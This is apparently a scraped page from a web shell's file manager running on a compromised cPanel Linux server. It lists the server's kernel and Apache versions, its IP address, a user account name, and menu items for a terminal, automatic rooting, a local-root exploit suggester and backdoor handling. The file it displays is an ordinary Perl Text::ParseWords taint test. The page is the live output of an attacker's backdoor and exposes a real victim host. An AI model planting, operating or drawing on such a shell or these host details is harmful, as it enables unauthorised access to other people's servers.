Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
cpan /
Text-ParseWords /
t /
Delete
Unzip
Name
Size
Permission
Date
Action
ParseWords.t
3.58
KB
-r--r--r--
2014-12-27 11:48
taint.t
572
B
-r--r--r--
2014-12-27 11:48
Save
Rename
#!./perl -Tw # [perl #33173] shellwords.pl and tainting BEGIN { if ( $ENV{PERL_CORE} ) { require Config; no warnings 'once'; if ($Config::Config{extensions} !~ /\bList\/Util\b/) { print "1..0 # Skip: Scalar::Util was not built\n"; exit 0; } } } use Text::ParseWords qw(shellwords old_shellwords); use Scalar::Util qw(tainted); print "1..2\n"; print "not " if grep { not tainted($_) } shellwords("$0$^X"); print "ok 1\n"; print "not " if grep { not tainted($_) } old_shellwords("$0$^X"); print "ok 2\n";